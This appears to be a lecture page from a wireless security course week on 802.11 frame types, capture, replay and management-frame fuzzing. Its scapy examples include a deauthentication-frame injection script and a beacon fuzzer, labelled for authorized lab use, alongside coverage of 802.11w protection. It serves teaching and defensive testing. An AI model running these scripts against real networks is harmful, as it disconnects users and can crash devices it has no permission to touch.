— ">
Classroom Glossary Public page

RF-201 Week 4 — Layer-2 WiFi 802.11: Capture, Replay, and Fuzzing

1,077 words

"The 802.11 management frame is the handshake protocol that runs before authentication. It was not designed with the assumption that an attacker could receive and forge it." — the implicit design assumption whose consequences WIR-101 laboratories demonstrated

Lecture (90 min)

4.1 802.11 Beyond WIR-101: What We Are Opening

WIR-101 Weeks 2-5 covered 802.11 at the wireless-pentest engagement level: monitor mode, airodump-ng, WPA handshake capture, hashcat cracking, PMKID capture, and basic deauthentication. RF-201 opens three things WIR-101 mentioned in passing:

  1. Replay at the frame level — capturing and retransmitting individual 802.11 frames
  2. Fuzzing management frames — generating malformed/mutated frames and observing target AP or client behavior
  3. scapy as the 802.11 frame-crafting tool — programmatic frame construction, manipulation, and injection

4.2 802.11 Frame Types: The Complete Picture

The 802.11 standard defines three frame types. WIR-101 introduced management frames. RF-201 covers all three.

Management frames: Control the association state machine. No encryption before authentication. Observable by any station in monitor mode.

Subtype Purpose Security implication
Probe Request Client scans for APs by SSID Reveals client's preferred network list
Probe Response AP announces itself Reveals AP capabilities, SSID, supported rates
Authentication Open System or SAE (WPA3) auth exchange SAE commit/confirm frames visible pre-association
Association Request Client negotiates parameters Reveals client capabilities
Association Response AP accepts/rejects
Deauthentication Terminate an association No authentication required to send; enables deauth attacks
Disassociation Terminate cleanly Same vulnerability as deauth
Beacon Periodic AP announcement 100 ms interval; BSSID/SSID/capabilities
Action Vendor-specific; block ACK negotiation; spectrum management 802.11n Block ACK setup; used in some fingerprinting techniques

Control frames: Manage channel access and acknowledgement. Part of CSMA/CA.

Subtype Purpose
RTS / CTS Request-to-Send / Clear-to-Send for collision avoidance
ACK Acknowledge unicast data/management frames
Block ACK Acknowledge a burst of buffered frames (802.11n+)
PS-Poll Power-save poll; retrieve buffered frames from AP

Data frames: Carry actual payload. WPA2/WPA3 encrypts these.

4.3 The 802.11 Frame Format: Dissection

A management frame has this structure:

| FC (2B) | Duration (2B) | Addr1 (6B) | Addr2 (6B) | Addr3 (6B) | Seq Ctrl (2B) | [Body] | FCS (4B) |

Frame Control (FC) encodes type (2b), subtype (4b), To DS, From DS, More Frag, Retry, Power Mgmt, More Data, Protected Frame, Order flags. The Protected Frame bit tells you if the frame body is encrypted.

Addresses: The interpretation of Addr1/2/3 depends on the To DS / From DS bits:

  • Infrastructure mode (client ↔ AP): Addr1 = receiver, Addr2 = transmitter, Addr3 = BSSID
  • WDS (bridge mode): all four address fields used

The BSSID is the AP's MAC address. It is unencrypted in every beacon and management frame. You can derive vendor from OUI (first 3 bytes), model from OUI+model tables, and sometimes firmware version from beacon IEs (Information Elements).

Information Elements (IEs): Variable-length TLV structures in management frames carrying SSID, supported rates, RSN (WPA/WPA2/WPA3 capabilities), HT/VHT/HE capabilities, country, channel, etc. Wireshark decodes IEs in the 802.11 dissector.

FCS: 32-bit CRC. Receivers drop frames with bad FCS. Injection: most monitor-mode drivers allow sending frames with either computed or manually specified FCS.

4.4 scapy 802.11 Layers

scapy is the primary tool for programmatic 802.11 frame crafting. You need monitor mode and a packet injection capable NIC (Alfa AWUS036ACM from WIR-101 works).

from scapy.layers.dot11 import (
    Dot11, Dot11Beacon, Dot11Elt, Dot11Auth, Dot11Deauth,
    Dot11AssoReq, Dot11AssoResp, RadioTap
)
from scapy.sendrecv import sendp, sniff

# Craft a deauthentication frame
deauth = (
    RadioTap() /
    Dot11(type=0, subtype=12,  # 0=mgmt, 12=deauth
          addr1="ff:ff:ff:ff:ff:ff",  # broadcast
          addr2="de:ad:be:ef:ca:fe",  # spoofed src
          addr3="11:22:33:44:55:66") /  # target BSSID
    Dot11Deauth(reason=7)
)

# Send 10 deauth frames on monitor interface
# AUTHORIZED LAB ENVIRONMENT ONLY
sendp(deauth, iface="wlan0mon", count=10, inter=0.1)

Capture and replay:

from scapy.all import rdpcap, wrpcap, sendp

# Load a PCAP captured in WIR-101
frames = rdpcap("wir101-lab2-association.pcap")

# Filter management frames
mgmt_frames = [f for f in frames if f.haslayer(Dot11) and f[Dot11].type == 0]
print(f"Management frames: {len(mgmt_frames)}")

# Inspect beacon IEs
for f in mgmt_frames:
    if f.haslayer(Dot11Beacon):
        ssid_ie = f[Dot11Elt]
        print("SSID:", ssid_ie.info.decode(errors='replace'))

4.5 Management Frame Fuzzing

What fuzzing 802.11 management frames means: Send malformed, mutated, or edge-case management frames to a target AP or client and observe:

  • Does the target crash, reboot, or lock up? (DoS)
  • Does the target produce unexpected frames in response? (state machine confusion)
  • Does the target associate or deauthenticate unexpectedly? (protocol bugs)

Known vulnerability classes from management-frame fuzzing:

  • Deauth flood: Sustained broadcast deauth causes clients to disconnect and prevents reassociation. No fix without 802.11w (Management Frame Protection, MFP).
  • SSID buffer overflow (historical): Some 802.11 drivers parsed SSID IEs without length bounds checking. CVE-based research (pre-2015) found several kernel driver crashes this way.
  • Malformed RSN IE: Some APs handle corrupted RSN (WPA2 capabilities) IEs incorrectly, leading to incorrect security negotiation or crash.
  • Action frame fuzzing: 802.11 Action frames carry vendor-specific content; parsing bugs have been found in AP firmware.

Fuzzing framework (Python + scapy):

import random
from scapy.layers.dot11 import Dot11, Dot11Elt, Dot11Beacon, RadioTap
from scapy.sendrecv import sendp

def fuzz_beacon(target_bssid, iface="wlan0mon"):
    # Mutate the SSID IE with random lengths and content
    ssid_content = bytes([random.randint(0, 255) for _ in range(random.randint(0, 255))])
    beacon = (
        RadioTap() /
        Dot11(type=0, subtype=8,
              addr1="ff:ff:ff:ff:ff:ff",
              addr2=target_bssid,
              addr3=target_bssid) /
        Dot11Beacon(cap=0x2105) /
        Dot11Elt(ID=0, info=ssid_content) /   # SSID IE with random content
        Dot11Elt(ID=1, info=b"\x82\x84\x8b\x96")  # supported rates
    )
    sendp(beacon, iface=iface, count=1, verbose=0)

# Run against sandboxed AP only — authorized lab environment
for _ in range(100):
    fuzz_beacon("00:11:22:33:44:55")

Lab 3 applies this against an instructor-controlled sandboxed AP. Observe the AP log and client behavior with Wireshark.

4.6 802.11w (Management Frame Protection)

802.11w (MFP), part of WPA3 and optional in WPA2, extends the TKIP/CCMP encryption to management frames. Deauthentication and disassociation frames become authenticated when both sides support MFP. Broadcast deauth floods fail because the forgery cannot pass MIC verification.

The catch: MFP is negotiated in the RSN IE during association. Both AP and client must support it. Legacy clients and APs without 802.11w support cannot use MFP and remain vulnerable to deauth floods.

Your tool journal note: airodump-ng shows "MFP: yes/no" in the network scan. An AP advertising WPA2 without MFP remains deauth-floodable regardless of passphrase strength.

Homework

Reading (1.5 hr):

  • PySDR Ch 9 (Noise and dB) — review at intermediate depth for SNR intuition
  • scapy documentation: Layer 2 (Dot11 classes) — docs.scapy.net
  • 802.11w (Management Frame Protection) — WPA3 specification Section 4 overview; free at Wi-Fi Alliance

Hands-on (1.5 hr): Using scapy, write a script that:

  1. Sniffs 802.11 frames in monitor mode for 30 seconds
  2. Prints a sorted frequency table of frame subtypes observed (Beacon, Probe Request, etc.)
  3. For each unique BSSID, prints: SSID, channel, MFP support (from RSN IE)

This is the basis of a passive 802.11 recon tool. Compare the output to what airodump-ng shows for the same environment.

Toolchain Diary Entry

First-introduce this week: scapy 802.11 / Dot11 layer

scapy: Python packet manipulation library. 802.11 support via the scapy.layers.dot11 module. Key classes: RadioTap, Dot11, Dot11Beacon, Dot11Deauth, Dot11Auth, Dot11Elt. Use ls(Dot11) in scapy interactive shell to see all field names. Use hexdump(frame) to see raw bytes. sendp(frame, iface="wlan0mon") injects at Layer 2; requires monitor mode.

Key Terms

  • Management frame: 802.11 frame type=0; controls association state machine; not encrypted before WPA3/802.11w
  • Information Element (IE): TLV structure in management frames; SSID/rates/RSN/HT/VHT/HE capabilities encoded here
  • FCS (Frame Check Sequence): 32-bit CRC appended to 802.11 frames; dropped by receiver if invalid; monitor mode delivers both valid and invalid
  • 802.11w (MFP): Management Frame Protection; authenticates deauth/disassoc frames; defeats deauth flood when deployed
  • Frame injection: transmit crafted 802.11 frames from software; requires monitor-mode-capable NIC and driver support
  • Deauth flood: sustained broadcast deauthentication frames; disconnects clients from AP; no defense without 802.11w